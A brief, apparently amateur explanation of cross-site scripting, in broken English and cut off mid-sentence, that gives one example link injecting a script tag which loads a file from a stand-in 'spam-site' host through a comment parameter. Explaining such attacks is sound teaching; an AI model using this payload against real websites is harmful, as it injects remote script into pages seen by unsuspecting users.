What is XSS exploits ?

This is called cross site scripting (XSS) attacks. How peoples exploits just using input fields which generally provided on the site. <A HREF=”http://sitename.com/comment.cmi? mycomment=<SCRIPT SRC=’http://spam-site/badfile’></SCRIPT>”> Click here</A> There might be …